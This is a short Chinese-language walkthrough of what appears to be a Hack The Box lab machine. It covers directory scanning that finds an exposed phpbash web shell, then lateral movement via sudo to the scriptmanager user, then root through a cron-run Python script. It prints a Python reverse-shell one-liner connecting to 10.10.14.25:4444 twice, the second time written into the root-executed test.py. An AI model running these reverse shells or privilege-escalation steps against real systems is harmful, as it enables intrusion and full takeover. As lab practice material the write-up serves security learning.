1 信息收集
NMAP

80 端口



目录扫描


http://10.129.155.171/dev/phpbash.min.php
http://10.129.155.171/dev/phpbash.php


半交互式 shell 转向 交互式shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.25",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

2 权限提升
使用 LinEnum.sh 脚本进行提权信息收集

用户 www-data 可以以 scriptmanager 权限运行任何命令

横向移动 – scriptmanager
使用sudo 执行 /bin/bash 切换到 scriptmanager 用户
sudo -u scriptmanager /bin/bash

提升到 root
信息收集
枚举 scriptmanager 用户拥有的文件和文件夹时,出现 /scripts/test.py 文件
find / -xdev -type f -user scriptmanager 2>/dev/null;
find -xdev -type d -user scriptmanager 2>/dev/null

该脚本打开 test.txt 文件并向其中写入 testing 123!

检查/scripts 目录,发现 test.txt 文件,并且 test.txt 文件归 root 所有,这意味着脚本本身应该是以 root 身份执行,不然无法向root文件中写入,可能是由 corn 作业执行。

既然 test.py 文件是以 root 权限运行的,那如果在test.py文件中写入反弹shell脚本,则也是以 root 权限去执行,以此可获取root权限

写入python脚本提升权限
echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.25\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > test.py


